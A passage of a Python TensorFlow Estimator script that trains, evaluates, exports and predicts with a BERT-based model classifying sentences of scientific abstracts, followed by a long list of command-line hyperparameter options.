input_fn=eval_spec.input_fn,\n steps=None,\n hooks=eval_spec.hooks,\n checkpoint_path=str(crossover_checkpoint),\n name=f'evaluate-{method}'\n )\n # calculate best threshold\n precision = np.array(\n eval_result_metrics['precision_recall_at_equal_thresholds'][4]\n )\n recall = np.array(\n eval_result_metrics['precision_recall_at_equal_thresholds'][5]\n )\n thresholds = np.array(\n eval_result_metrics['precision_recall_at_equal_thresholds'][6]\n )\n eval_result_metrics['best_threshold_f1'] = max(\n zip(thresholds, 2 * precision * recall / (precision + recall)),\n key=lambda x: x[1]\n )\n print(f\"=== best_threshold_f1 ({method}): ({eval_result_metrics['best_threshold_f1'][0]:.3f}, {eval_result_metrics['best_threshold_f1'][1]:.8f})\")\n crossover_meta['best_threshold_f1'][method] = eval_result_metrics['best_threshold_f1']\n crossover_output_temp = crossover_output_prefix / f'{crossover_output_prefix.name}-crossover-meta-progress.json'\n with crossover_output_temp.open(encoding='utf-8', mode='w') as f: # pylint: disable=no-member\n json.dump(\n crossover_meta,\n f,\n indent=2,\n sort_keys=False,\n cls=NumpyEncoder\n )\n \n # save results\n print('save results')\n crossover_output = crossover_output_prefix / f'{crossover_output_prefix.name}-crossover-meta.json'\n with crossover_output.open(encoding='utf-8', mode='a') as f: # pylint: disable=no-member\n json.dump(\n crossover_meta,\n f,\n indent=2,\n sort_keys=False,\n cls=NumpyEncoder\n )\n return\n \n epoch_checkpoint_re = re.compile(r'.*epoch-(\\d+)-\\d+$')\n while True:\n # figure out the model dir to use\n model_dir = FLAGS.model_dir\n if FLAGS.job == 'train':\n if FLAGS.model_dir:\n assert FLAGS.max_runs <= 1, f\"set --model_dir_prefix instead of --model_dir for multiple runs\"\n else:\n assert FLAGS.model_dir_prefix, f\"set either --model_dir_prefix or --model_dir\"\n run_i = 1\n while run_i <= FLAGS.max_runs or FLAGS.max_runs == -1:\n epoch_i = 0\n model_dir = FLAGS.model_dir or f\"{FLAGS.model_dir_prefix}-{run_i:05d}\"\n latest_checkpoint = tf.train.latest_checkpoint(model_dir, latest_filename='epoch.latest')\n if not latest_checkpoint:\n break # got fresh run\n # parse epoch_i, error out if unparsable\n epoch_i = int(epoch_checkpoint_re.match(latest_checkpoint).group(1))\n if epoch_i < FLAGS.max_epochs or FLAGS.max_epochs == -1:\n break # got partial run\n run_i += 1\n if FLAGS.model_dir:\n tf.logging.info(f\"Finished 1 run of {FLAGS.max_epochs} epochs!\")\n return\n else:\n tf.logging.info(f\"Finished all {FLAGS.max_runs} runs of {FLAGS.max_epochs} epochs!\")\n return\n assert model_dir, f\"empty model_dir\"\n # Parse experiment_name and host_script_name if needed\n # Example: --model_dir=${MODELDIR}/Attention_lr0.5_ws35000_${CARDTYPE}_${HOSTSCRIPT}.${NUMGPU}\n # experiment_name = Attention\n # host_script_name = ${HOSTSCRIPT}.${NUMGPU}\n model_dir_parts = Path(model_dir).name.split('_')\n if len(model_dir_parts) > 1:\n if FLAGS.experiment_name == 'PARSE': # Default: Exp\n FLAGS.experiment_name = model_dir_parts[0]\n if FLAGS.host_script_name == 'PARSE': # Default: tensorflow\n FLAGS.host_script_name = model_dir_parts[-1]\n # '\\x1b[32m%(asctime)s,%(msecs)03d\\x1b[0m \\x1b[1;35m%(hostname)s\\x1b[0m \\x1b[34m%(name)s[%(process)d]\\x1b[0m \\x1b[1;30m%(levelname)s\\x1b[0m %(message)s'\n coloredlogs.DEFAULT_LOG_FORMAT = f'\\x1b[32m%(asctime)s,%(msecs)03d\\x1b[0m \\x1b[1;35m{FLAGS.experiment_name}\\x1b[0m \\x1b[34m{FLAGS.host_script_name}[%(process)d]\\x1b[0m \\x1b[1;30m%(levelname)s\\x1b[0m %(message)s'\n coloredlogs.install(\n level='DEBUG',\n logger=logger,\n milliseconds=True,\n stream=logger.handlers[0].stream\n )\n\n estimator, train_spec, eval_spec = create_estimator_and_specs(\n run_config=tf.estimator.RunConfig(\n train_distribute=distribution,\n model_dir=model_dir,\n # Directory to save model parameters, graph and etc. This can\n # also be used to load checkpoints from the directory into a estimator to\n # continue training a previously saved model. If `PathLike` object, the\n # path will be resolved. If `None`, the model_dir in `config` will be used\n # if set. If both are set, they must be same. If both are `None`, a\n # temporary directory will be used.\n tf_random_seed=FLAGS.random_seed, # 33\n # Random seed for TensorFlow initializers.\n # Setting this value allows consistency between reruns.\n save_summary_steps=FLAGS.save_summary_steps, # 10\n # if not None, a SummarySaverHook will be added in MonitoredTrainingSession()\n # The frequency, in number of global steps, that the\n # summaries are written to disk using a default SummarySaverHook. If both\n # `save_summaries_steps` and `save_summaries_secs` are set to `None`, then\n # the default summary saver isn't used. Default 100.\n save_checkpoints_steps=None, # 100\n # Save checkpoints every this many steps.\n # save_checkpoints_secs=None,\n # We will define our own CheckpointSaverHook in EstimatorSpec.training_chief_hooks\n save_checkpoints_secs=FLAGS.save_checkpoints_secs, # 10m\n # if not None, a CheckpointSaverHook will be added in MonitoredTrainingSession()\n # Save checkpoints every this many seconds with\n # CheckpointSaverHook. Can not be specified with `save_checkpoints_steps`.\n # Defaults to 600 seconds if both `save_checkpoints_steps` and\n # `save_checkpoints_secs` are not set in constructor.\n # If both `save_checkpoints_steps` and `save_checkpoints_secs` are None,\n # then checkpoints are disabled.\n keep_checkpoint_max=FLAGS.keep_checkpoint_max, # 5\n # Maximum number of checkpoints to keep. As new checkpoints\n # are created, old ones are deleted. If None or 0, no checkpoints are\n # deleted from the filesystem but only the last one is kept in the\n # `checkpoint` file. Presently the number is only roughly enforced. For\n # example in case of restarts more than max_to_keep checkpoints may be\n # kept.\n keep_checkpoint_every_n_hours=FLAGS.keep_checkpoint_every_n_hours, # 6\n # keep an additional checkpoint\n # every `N` hours. For example, if `N` is 0.5, an additional checkpoint is\n # kept for every 0.5 hours of training, this is in addition to the\n # keep_checkpoint_max checkpoints.\n # Defaults to 10,000 hours.\n log_step_count_steps=None, # Customized LoggingTensorHook defined in model_fn\n # if not None, a StepCounterHook will be added in MonitoredTrainingSession()\n # log_step_count_steps=FLAGS.log_step_count_steps, # 10\n # The frequency, in number of global steps, that the\n # global step/sec will be logged during training.\n session_config=session_config\n )\n )\n\n if FLAGS.job == 'eval':\n if not FLAGS.eval_predict_checkpoint:\n FLAGS.eval_predict_checkpoint = tf.train.latest_checkpoint(\n model_dir\n )\n tf.logging.info(\n 'Evaluating checkpoint: %s', FLAGS.eval_predict_checkpoint\n )\n eval_result_metrics = estimator.evaluate(\n input_fn=eval_spec.input_fn,\n steps=\n None, # Number of steps for which to evaluate model. If None, evaluates until input_fn raises an end-of-input exception.\n hooks=eval_spec.hooks,\n checkpoint_path=FLAGS.eval_predict_checkpoint,\n name='evaluate'\n )\n # calculate best threshold\n global_step = eval_result_metrics['global_step']\n precision = np.array(\n eval_result_metrics['precision_recall_at_equal_thresholds'][4]\n )\n recall = np.array(\n eval_result_metrics['precision_recall_at_equal_thresholds'][5]\n )\n thresholds = np.array(\n eval_result_metrics['precision_recall_at_equal_thresholds'][6]\n )\n eval_result_metrics['best_threshold'] = max(\n zip(thresholds, 2 * precision * recall / (precision + recall)),\n key=lambda x: x[1]\n )\n print('best_threshold:', eval_result_metrics['best_threshold'])\n # precision_article = np.array(\n # eval_result_metrics['precision_recall_at_equal_thresholds_article'][4]\n # )\n # recall_article = np.array(\n # eval_result_metrics['precision_recall_at_equal_thresholds_article'][5]\n # )\n # thresholds_article = np.array(\n # eval_result_metrics['precision_recall_at_equal_thresholds_article'][6]\n # )\n # eval_result_metrics['best_threshold_article'] = max(\n # zip(thresholds_article, 2 * precision_article * recall_article / (precision_article + recall_article)),\n # key=lambda x: x[1]\n # )\n # print('best_threshold_article:', eval_result_metrics['best_threshold_article'])\n # # save eval results\n # if not FLAGS.eval_dir:\n # FLAGS.eval_dir = str(\n # Path(model_dir) / 'eval-{}'.format(global_step)\n # )\n # if not FLAGS.eval_prefix:\n # FLAGS.eval_prefix = '{}@{}'.format(\n # Path(model_dir).name, global_step\n # )\n # output_path = Path(FLAGS.eval_dir\n # ) / '{}-metrics.{}'.format(FLAGS.eval_prefix, 'json')\n # # assert dirs\n # output_path.parent.mkdir(parents=True, exist_ok=True) # pylint: disable=no-member\n # with output_path.open(encoding='utf-8', mode='a') as f: # pylint: disable=no-member\n # json.dump(\n # eval_result_metrics,\n # f,\n # indent=2,\n # sort_keys=False,\n # cls=NumpyEncoder\n # )\n elif FLAGS.job == 'export':\n if not FLAGS.export_checkpoint:\n FLAGS.export_checkpoint = tf.train.latest_checkpoint(\n model_dir\n )\n if not FLAGS.export_dir:\n FLAGS.export_dir = str(Path(model_dir) / 'export')\n tf.logging.info('Exporting checkpoint: %s', FLAGS.export_checkpoint)\n export_dir = estimator.export_saved_model(\n export_dir_base=FLAGS.export_dir,\n # serving_input_receiver_fn=serving_input_dataset_receiver_fn,\n serving_input_receiver_fn=serving_input_str_receiver_fn,\n assets_extra=None,\n as_text=False,\n checkpoint_path=FLAGS.export_checkpoint\n )\n tf.logging.info('Checkpoint exported to: %s', export_dir)\n # signature_def['serving_default']:\n # The given SavedModel SignatureDef contains the following input(s):\n # inputs['protein_sequences'] tensor_info:\n # dtype: DT_STRING\n # shape: (-1)\n # name: input_protein_string_tensor:0\n # The given SavedModel SignatureDef contains the following output(s):\n # outputs['classes'] tensor_info:\n # dtype: DT_INT32\n # shape: (-1, -1)\n # name: predictions/ArgMax:0\n # outputs['top_classes'] tensor_info:\n # dtype: DT_INT32\n # shape: (-1, -1, 3)\n # name: predictions/TopKV2:1\n # outputs['top_probs'] tensor_info:\n # dtype: DT_FLOAT\n # shape: (-1, -1, 3)\n # name: predictions/TopKV2:0\n # Method name is: tensorflow/serving/predict\n elif FLAGS.job == 'predict':\n if not FLAGS.eval_predict_checkpoint:\n FLAGS.eval_predict_checkpoint = tf.train.latest_checkpoint(\n model_dir\n )\n tf.logging.info('Loading checkpoint: %s', FLAGS.eval_predict_checkpoint)\n predictions = estimator.predict(\n input_fn=input_fn,\n # predict_keys=[\n # 'predicted_sentence_classes', 'predicted_sentence_class_scores',\n # 'predicted_article_classes', 'predicted_article_class_scores'\n # ],\n predict_keys=[\n 'predicted_sentence_classes', 'predicted_sentence_class_scores'\n ],\n hooks=None,\n checkpoint_path=FLAGS.eval_predict_checkpoint,\n # yield_single_examples=True\n yield_single_examples=False\n )\n sentence_pred_list = []\n sentence_scores_list = []\n # article_pred_list = []\n # article_scores_list = []\n total = math.ceil(20000 / FLAGS.predict_batch_size)\n with tqdm(\n # total=131166,\n # unit='sentences',\n total=total,\n unit='batches',\n # total=FLAGS.metadata['test']['articles'],\n # unit='articles',\n dynamic_ncols=True,\n ascii=True,\n smoothing=0.1,\n desc='predictions'\n ) as t:\n for i, p in enumerate(predictions):\n t.update()\n # print(i, p)\n # pred_list.append(p)\n # sentence_pred_list.append(p['predicted_sentence_classes'].tolist())\n # sentence_scores_list.append(\n # p['predicted_sentence_class_scores'].tolist()\n # )\n # article_pred_list.append(p['predicted_article_classes'].tolist())\n # article_scores_list.append(\n # p['predicted_article_class_scores'].tolist()\n # )\n # if i > 10:\n # break\n sentence_pred_list += p['predicted_sentence_classes'].tolist()\n sentence_scores_list += p['predicted_sentence_class_scores'].tolist()\n # article_pred_list += p['predicted_article_classes'].tolist()\n # article_scores_list += p['predicted_article_class_scores'].tolist()\n # print(pred_list)\n # save predictions\n print('save predictions')\n output_path = Path(\n FLAGS.eval_predict_checkpoint + FLAGS.predict_prefix +\n '-predict-sentence.json'\n )\n with output_path.open(encoding='utf-8', mode='w') as f: # pylint: disable=no-member\n json.dump(sentence_pred_list, f, indent=2, sort_keys=False, cls=NumpyEncoder)\n # output_path = Path(\n # FLAGS.eval_predict_checkpoint + FLAGS.article_predict_prefix +\n # '-predict-article.json'\n # )\n # with output_path.open(encoding='utf-8', mode='w') as f: # pylint: disable=no-member\n # json.dump(article_pred_list, f, indent=2, sort_keys=False, cls=NumpyEncoder)\n \n # save predictions\n print('save scores')\n output_path = Path(\n FLAGS.eval_predict_checkpoint + FLAGS.predict_prefix +\n '-scores-sentence.json'\n )\n with output_path.open(encoding='utf-8', mode='w') as f: # pylint: disable=no-member\n json.dump(\n sentence_scores_list, f, indent=2, sort_keys=False, cls=NumpyEncoder\n )\n # output_path = Path(\n # FLAGS.eval_predict_checkpoint + FLAGS.article_predict_prefix +\n # '-scores-article.json'\n # )\n # with output_path.open(encoding='utf-8', mode='w') as f: # pylint: disable=no-member\n # json.dump(\n # article_scores_list, f, indent=2, sort_keys=False, cls=NumpyEncoder\n # )\n\n # assert sentence count\n print('assert sentence count')\n # parse task1_sample_submission.csv\n sentence_count = 0\n predict_sample_submission_path = Path(FLAGS.predict_sample_submission)\n with predict_sample_submission_path.open(\n encoding='utf-8', mode='r'\n ) as f, tqdm(\n dynamic_ncols=True,\n ascii=True,\n desc=predict_sample_submission_path.name,\n unit='lines'\n ) as t:\n rows = csv.DictReader(f)\n for row in rows:\n t.update()\n article, sentence = row['order_id'].split('_')\n if int(article[1:]) <= 20000:\n sentence_count += 1\n print(\n f'Sentences in {predict_sample_submission_path.name}: {sentence_count}'\n )\n print(f'Sentences in sentence_pred_list: {len(sentence_pred_list)}')\n # assert\n if len(sentence_pred_list) != sentence_count:\n print(f\"===DEBUG: len(sentence_pred_list) != sentence_count\")\n\n # write submission.csv\n print('write submission.csv')\n predict_sample_submission_path = Path(FLAGS.predict_sample_submission)\n output_path = Path(\n FLAGS.eval_predict_checkpoint + FLAGS.predict_prefix +\n '-submission-sentence.csv'\n )\n with predict_sample_submission_path.open(\n encoding='utf-8', mode='r'\n ) as f, output_path.open(encoding='utf-8', mode='w',\n newline='') as out_f, tqdm(\n dynamic_ncols=True,\n ascii=True,\n smoothing=0.1,\n desc=predict_sample_submission_path.name,\n unit='lines'\n ) as t:\n rows = csv.DictReader(f)\n writer = csv.DictWriter(\n out_f,\n fieldnames=rows.fieldnames,\n quoting=csv.QUOTE_MINIMAL,\n lineterminator='\\n'\n )\n writer.writeheader()\n for i, row in enumerate(rows):\n t.update()\n if i < len(sentence_pred_list):\n predictions = sentence_pred_list[i]\n row['BACKGROUND'] = str(predictions[0])\n row['OBJECTIVES'] = str(predictions[1])\n row['METHODS'] = str(predictions[2])\n row['RESULTS'] = str(predictions[3])\n row['CONCLUSIONS'] = str(predictions[4])\n row['OTHERS'] = str(predictions[5])\n writer.writerow(row)\n\n # write submission-article.csv\n # print('write submission-article.csv')\n # predict_sample_submission_article_path = Path(FLAGS.predict_sample_submission_article)\n # output_path = Path(\n # FLAGS.eval_predict_checkpoint + FLAGS.article_predict_prefix +\n # '-submission-article.csv'\n # )\n # with predict_sample_submission_article_path.open(\n # encoding='utf-8', mode='r'\n # ) as f, output_path.open(encoding='utf-8', mode='w',\n # newline='') as out_f, tqdm(\n # dynamic_ncols=True,\n # ascii=True,\n # smoothing=0.1,\n # desc=predict_sample_submission_article_path.name,\n # unit='lines'\n # ) as t:\n # rows = csv.DictReader(f)\n # writer = csv.DictWriter(\n # out_f,\n # fieldnames=rows.fieldnames,\n # quoting=csv.QUOTE_MINIMAL,\n # lineterminator='\\n'\n # )\n # writer.writeheader()\n # for i, row in enumerate(rows):\n # t.update()\n # if i < len(article_pred_list):\n # predictions = article_pred_list[i]\n # row['THEORETICAL'] = str(predictions[0])\n # row['ENGINEERING'] = str(predictions[1])\n # row['EMPIRICAL'] = str(predictions[2])\n # row['OTHERS'] = str(predictions[3])\n # writer.writerow(row)\n elif FLAGS.job == 'train':\n while epoch_i < FLAGS.max_epochs or FLAGS.max_epochs == -1:\n tf.logging.info(f\"Starting epoch {epoch_i+1}/{FLAGS.max_epochs} of run {run_i}/{FLAGS.max_runs}\")\n eval_result_metrics, export_results = tf.estimator.train_and_evaluate(\n estimator, train_spec, eval_spec\n )\n tf.logging.info(f\"Finished epoch {epoch_i+1}/{FLAGS.max_epochs} of run {run_i}/{FLAGS.max_runs}\")\n epoch_i += 1\n continue\n return\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.register('type', 'bool', lambda v: v.lower() == 'true')\n parser.register('type', 'list', lambda v: ast.literal_eval(v))\n\n parser.add_argument(\n '--model_dir',\n type=str,\n default='',\n help='Path for saving model checkpoints during training'\n )\n parser.add_argument(\n '--model_dir_prefix',\n type=str,\n default='',\n help='Path prefix for saving model checkpoints during training'\n )\n parser.add_argument(\n '--experiment_name',\n type=str,\n default='PARSE',\n help=\n 'Experiment name for logging purposes, if \"PARSE\", split model_dir by \"_\" and use the first part as the experiment name'\n )\n parser.add_argument(\n '--host_script_name',\n type=str,\n default='PARSE',\n help=\n 'Host script name for logging purposes (8086K1-1.2), if \"PARSE\", split model_dir by \"_\" and use the last part as the host script name'\n )\n parser.add_argument(\n '--job',\n type=str,\n choices=['train', 'eval', 'predict', 'dataprep', 'export', 'crossover'],\n default='train',\n help='Set job type to run'\n )\n parser.add_argument(\n '--max_epochs',\n type=int,\n default=-1, #\n help='Stop training and maybe start a new run after this many epochs. -1 to train forever'\n )\n parser.add_argument(\n '--max_runs',\n type=int,\n default=-1, #\n help='Stop training after this many runs. -1 to train forever'\n )\n parser.add_argument(\n '--export_dir',\n type=str,\n default='',\n help=\n 'Path for saving the exported SavedModel. Default: ${model_dir}/export'\n )\n parser.add_argument(\n '--export_checkpoint',\n type=str,\n default='',\n help=\n 'Checkpoint to export to SavedModel, ex: \"model_dir/step-380176\". Default: latest checkpoint in model_dir'\n )\n parser.add_argument(\n '--eval_predict_checkpoint',\n type=str,\n default='',\n help=\n 'Checkpoint to use for evaluation and prediction, ex: \"model_dir/step-380176\". Default: latest checkpoint in model_dir'\n )\n parser.add_argument(\n '--crossover_checkpoints',\n type=str,\n default='',\n help=\n 'Checkpoints to use for crossover'\n )\n parser.add_argument(\n '--crossover_output_prefix',\n type=str,\n default='',\n help='string to add to crossover output filenames'\n )\n parser.add_argument(\n '--crossover_weights',\n type='list',\n default='[0,101,10]',\n help='crossover weights'\n )\n parser.add_argument(\n '--predict_prefix',\n type=str,\n default='',\n help='string to add to prediction output filenames'\n )\n parser.add_argument(\n '--article_predict_prefix',\n type=str,\n default='',\n help='string to add to article prediction output filenames'\n )\n parser.add_argument(\n '--predict_data',\n type=str,\n default='',\n help='Path to predict data (tf.Example in TFRecord format)'\n )\n parser.add_argument(\n '--predict_sample_submission',\n type=str,\n default='',\n help='Path to the task1_sample_submission.csv file.'\n )\n parser.add_argument(\n '--predict_sample_submission_article',\n type=str,\n default='',\n help='Path to the task2_sample_submission.csv file.'\n )\n parser.add_argument(\n '--predict_threshold',\n type=float,\n default=0.5,\n help='predict_threshold.'\n )\n parser.add_argument(\n '--article_predict_threshold',\n type=float,\n default=0.5,\n help='article_predict_threshold.'\n )\n parser.add_argument(\n '--eval_dir',\n type=str,\n default='',\n help=\n 'Path for saving evaluation results. Default: ${model_dir}/eval-${global_step}'\n )\n parser.add_argument(\n '--eval_prefix',\n type=str,\n default='',\n help=\n 'Filename prefix for evaluation results. Default: ${model_dir}@${global_step}'\n )\n parser.add_argument(\n '--eval_format',\n type=str,\n choices=['json', 'msgpack', 'msgpack.gz'],\n default='json',\n help=\n 'File format of evaluation results, one of [\"json\", \"msgpack\", \"msgpack.gz\"]. Default: json'\n )\n parser.add_argument(\n '--eval_level',\n type=str,\n choices=['topk', 'min'],\n default='min',\n help=\n 'Amount of data saved by evaluation, one of [\"topk\", \"min\"]. Default: min'\n )\n parser.add_argument(\n '--eval_precision_recall_at_equal_thresholds',\n type='bool',\n default='False',\n help='Output metrics precision_recall_at_equal_thresholds'\n )\n parser.add_argument(\n '--predict_top_k',\n type=int,\n default=3, #\n help='Save only the top k most probable classes for each amino acid.'\n )\n parser.add_argument(\n '--training_data',\n type=str,\n # default='D:/datasets/pfam-regions-d0-s20/pfam-regions-d0-s20-train.tfrecords',\n default='D:/datasets/pfam-regions-d10-s20-train.tfrecords',\n help='Path to training data (tf.Example in TFRecord format)'\n )\n parser.add_argument(\n '--eval_data',\n type=str,\n # default='D:/datasets/pfam-regions-d0-s20/pfam-regions-d0-s20-test.tfrecords',\n default='D:/datasets/pfam-regions-d10-s20-test.tfrecords',\n help='Path to evaluation data (tf.Example in TFRecord format)'\n )\n parser.add_argument(\n '--data_version',\n type=str,\n default='v2',\n help=\n 'Data format version of training and evaluation data. v1 uses SequenceExample, v2 uses Example'\n )\n parser.add_argument(\n '--metadata_path',\n type=str,\n # default='D:/datasets/pfam-regions-d0-s20/pfam-regions-d0-s20-test.tfrecords',\n default='',\n help='Path to metadata.json generated by prep_dataset'\n )\n parser.add_argument(\n '--max_sentences',\n type=int,\n default=50, # current train test max is 26\n help='Maximum number of sentences per abstract.'\n )\n parser.add_argument(\n '--num_classes',\n type=int,\n # default=16712 + 3, # 'PAD', 'NO_DOMAIN', 'UNKNOWN_DOMAIN'\n default=-1, # 'PAD', 'NO_DOMAIN', 'UNKNOWN_DOMAIN'\n help='Number of domain classes.'\n )\n parser.add_argument(\n '--classes_file',\n type=str,\n default='',\n help='Path to a file with the classes - one class per line'\n )\n\n parser.add_argument(\n '--num_gpus',\n type=int,\n default=0,\n help='Number of GPUs to use, defaults to total number of gpus available.'\n )\n parser.add_argument(\n '--num_cpu_threads',\n type=int,\n default=0,\n help=\n 'Number of CPU threads to use, defaults to half the number of hardware threads.'\n )\n parser.add_argument(\n '--random_seed', type=int, default=-1, help='The random seed.'\n )\n parser.add_argument(\n '--use_xla',\n type='bool',\n default='False',\n help='Whether to enable JIT XLA.'\n )\n parser.add_argument(\n '--use_fp16',\n type='bool',\n default='False',\n help='Whether to enable automatic mixed precision.'\n )\n parser.add_argument(\n '--use_tensor_ops',\n type='bool',\n default='False',\n help='Whether to use tensorcores or not.'\n )\n parser.add_argument(\n '--save_summary_steps',\n type=int,\n default=100,\n help='Save summaries every this many steps.'\n )\n parser.add_argument(\n '--save_checkpoints_steps',\n type=int,\n default=100000,\n help='Save checkpoints every this many steps.'\n )\n parser.add_argument(\n '--save_checkpoints_secs',\n type=int,\n default=30 * 60,\n help='Save checkpoints every this many seconds.'\n )\n parser.add_argument(\n '--keep_checkpoint_max',\n type=int,\n default=1000,\n help='The maximum number of recent checkpoint files to keep.'\n )\n parser.add_argument(\n '--keep_checkpoint_every_n_hours',\n type=float,\n default=6,\n help='Keep an additional checkpoint every `N` hours.'\n )\n parser.add_argument(\n '--log_step_count_steps',\n type=int,\n default=10,\n help=\n 'The frequency, in number of global steps, that the global step/sec will be logged during training.'\n )\n parser.add_argument(\n '--eval_delay_secs',\n type=int,\n default=30 * 24 * 60 * 60,\n help=\n 'Start distributed continuous evaluation after waiting for this many seconds. Not used in local training.'\n )\n parser.add_argument(\n '--eval_throttle_secs',\n type=int,\n default=30 * 24 * 60 * 60,\n help='Stop training and start evaluation after this many seconds.'\n )\n\n parser.add_argument(\n '--steps',\n type=int,\n default=0, # 100000,\n help='Number of training steps, if 0 train forever.'\n )\n parser.add_argument(\n '--eval_steps',\n type=int,\n default=-1, # 100000,\n help='Number of evaluation steps, if 0, evaluates until end-of-input.'\n )\n\n parser.add_argument(\n '--dataset_buffer',\n type=int,\n default=256,\n help='Number of MB in the read buffer.'\n )\n parser.add_argument(\n '--dataset_parallel_reads',\n type=int,\n default=1,\n help='Number of input Datasets to interleave from in parallel.'\n )\n parser.add_argument(\n '--shuffle_buffer',\n type=int,\n default=16 * 1024,\n help='Maximum number elements that will be buffered when shuffling input.'\n )\n parser.add_argument(\n '--repeat_count',\n type=int,\n default=1,\n help='Number of times the dataset should be repeated.'\n )\n parser.add_argument(\n '--batch_size',\n type=int,\n default=1,\n help=\n 'Batch size to use for longest sequence for training/evaluation. 1 if GPU Memory <= 6GB, 2 if <= 12GB'\n )\n parser.add_argument(\n '--predict_batch_size',\n type=int,\n default=128,\n help='Batch size to use for for prediction.'\n )\n parser.add_argument(\n '--max_batch_size',\n type=int,\n default=128,\n help='Max batch size for short sequences'\n )\n parser.add_argument(\n '--prefetch_buffer',\n type=int,\n default=64,\n help='Maximum number of batches that will be buffered when prefetching.'\n )\n\n parser.add_argument(\n '--conv_catagorical_fields',\n type='list',\n default='[0,2,3,4]',\n help=\n 'Catagorical fields to feed into convolution bank, multiple choice: 0:\"year\", 1:\"title_features\", 2:\"categories_features\", 3:\"fields_features\", 4:\"authors_features\".'\n )\n parser.add_argument(\n '--dense_catagorical_fields',\n type='list',\n default='[0]',\n help=\n 'Catagorical fields to feed into dense layer, multiple choice: 0:\"year\", 1:\"title_features\", 2:\"categories_features\", 3:\"fields_features\", 4:\"authors_features\".'\n )\n parser.add_argument(\n '--sent_conv_catagorical_fields',\n type='list',\n default='[0,1,2,3,4]',\n help=\n 'Catagorical fields to add to sentence pooling, multiple choice: 0:\"year\", 1:\"title_features\", 2:\"categories_features\", 3:\"fields_features\", 4:\"authors_features\".'\n )\n parser.add_argument(\n '--segment_id_input',\n type='list',\n default='[2]',\n help=\n 'Locations to concat segment_id, multiple choice: 1:\"conv\", 2:\"rnn\", 3:\"dense\".'\n )\n # parser.add_argument(\n # '--hub_model',\n # type=str,\n # choices=[\n # 'bert_uncased_L-12_H-768_A-12', 'bert_uncased_L-24_H-1024_A-16', 'bert_cased_L-12_H-768_A-12'\n # ],\n # default='bert_uncased_L-12_H-768_A-12',\n # help='Hub Model'\n # )\n parser.add_argument(\n '--init_checkpoint_root',\n type=str,\n default=r'/data12/tbrain/scibert_scivocab_uncased',\n help='Initial checkpoint (usually from a pre-trained BERT model).'\n )\n parser.add_argument(\n '--ckpt_name',\n type=str,\n default='bert_model.ckpt',\n help='checkpoint name.'\n )\n parser.add_argument(\n '--title_init_checkpoint_root',\n type=str,\n default=r'/data12/tbrain/biobert_v1.1_pubmed',\n help='Initial checkpoint (usually from a pre-trained BERT model).'\n )\n parser.add_argument(\n '--title_ckpt_name',\n type=str,\n default='model.ckpt-1000000',\n help='checkpoint name.'\n )\n parser.add_argument(\n '--title_dense_units',\n type=int,\n default=256,\n help='Number of units for authors embedding.'\n )\n parser.add_argument(\n '--authors_embed_dim',\n type=int,\n default=64,\n help='Number of units for authors embedding.'\n )\n parser.add_argument(\n '--authors_rnn_units',\n type=int,\n default=64,\n help='Number of units for authors rnn.'\n )\n parser.add_argument(\n '--categories_embed_dim',\n type=int,\n default=256,\n help='Number of units for authors embedding.'\n )\n parser.add_argument(\n '--categories_rnn_units',\n type=int,\n default=256,\n help='Number of units for authors rnn.'\n )\n parser.add_argument(\n '--fields_embed_dim',\n type=int,\n default=16,\n help='Number of units for authors embedding.'\n )\n parser.add_argument(\n '--fields_rnn_units',\n type=int,\n default=16,\n help='Number of units for authors rnn.'\n )\n parser.add_argument(\n '--input_norm',\n type=str,\n choices=['None', 'Batch', 'Layer'],\n default='Layer',\n help='Input Normalization'\n )\n parser.add_argument(\n '--rnn_norm',\n type=str,\n choices=['None', 'Batch', 'Layer'],\n default='Layer',\n help='RNN Normalization'\n )\n parser.add_argument(\n '--dense_norm',\n type=str,\n choices=['None', 'Batch', 'Layer'],\n default='None',\n help='Dense Normalization'\n )\n\n parser.add_argument(\n '--embed_dim', type=int, default=768, help='Embedding dimensions.'\n )\n parser.add_argument(\n '--use_xlnet_zero_seg_ids',\n type='bool',\n default='False',\n help='Use all zeros for segment_ids input.'\n )\n parser.add_argument(\n '--xlnet_dropout',\n type=float,\n default=0.1,\n help='Dropout rate used in xlnet layers.'\n )\n parser.add_argument(\n '--embedded_dropout',\n type=float,\n default=0.2,\n help='Dropout rate used after embedding layers.'\n )\n parser.add_argument(\n '--feature_dropout',\n type=float,\n default=0.4,\n help='Dropout rate used after feature rnn layers.'\n )\n\n parser.add_argument(\n '--conv_bank_size',\n type=int,\n default=15,\n help='Convolution bank kernal sizes 1 to bank_size.'\n )\n parser.add_argument(\n '--conv_filters',\n type=int,\n default=32,\n help='Number of convolution filters.'\n )\n parser.add_argument(\n '--conv_kernel_size',\n type=int,\n default=7,\n help='Length of the convolution filters.'\n )\n parser.add_argument(\n '--conv_strides',\n type=int,\n default=1,\n help=\n 'The number of entries by which the filter is moved right at each step..'\n )\n parser.add_argument(\n '--conv_dropout',\n type=float,\n default=0.3,\n help='Dropout rate used for convolution layer outputs.'\n )\n parser.add_argument(\n '--use_conv_batch_norm',\n type='bool',\n default='True',\n help='Apply batch normalization after convolution layers.'\n )\n parser.add_argument(\n '--use_conv_residual',\n type='bool',\n default='True',\n help='Add residual connection after convolution layer 1.'\n )\n parser.add_argument(\n '--use_rnn_residual',\n type='bool',\n default='False',\n help='Add residual connection after rnn layer.'\n )\n parser.add_argument(\n '--use_dense_residual',\n type='bool',\n default='False',\n help='Add residual connection after dense layer.'\n )\n parser.add_argument(\n '--use_conv_highway',\n type='bool',\n default='True',\n help='Add a highway network after convolution layer 1.'\n )\n parser.add_argument(\n '--conv_highway_depth',\n type=int,\n default=3,\n help='Number of layers of highway network.'\n )\n parser.add_argument(\n '--conv_highway_units',\n type=int,\n default=1248,\n help='Number of units per layer of highway network.'\n )\n\n parser.add_argument(\n '--rnn_cell_type',\n type=str,\n choices=['LSTM', 'GRU', 'encoder', 'None'],\n default='GRU',\n help='RNN Cell Type'\n )\n parser.add_argument(\n '--rnn_num_units',\n type='list',\n default='[128]',\n help='Number of node per recurrent network layer.'\n )\n parser.add_argument(\n '--rnn_dropout',\n type=float,\n default=0.0,\n help='Dropout rate used between rnn layers.'\n )\n parser.add_argument(\n '--rnn_recurrent_dropout',\n type=float,\n default=0.0,\n help=\n 'Dropout rate used between rnn timesteps, needs to be 0.0 to use cudnn.'\n )\n parser.add_argument(\n '--dense_units',\n type='list',\n # default='[256,128,64]',\n default='[None]',\n help='Number of units for the dense layers.'\n )\n parser.add_argument(\n '--dense_dropout',\n type=float,\n default=0.4,\n help='Dropout rate used after dense layers.'\n 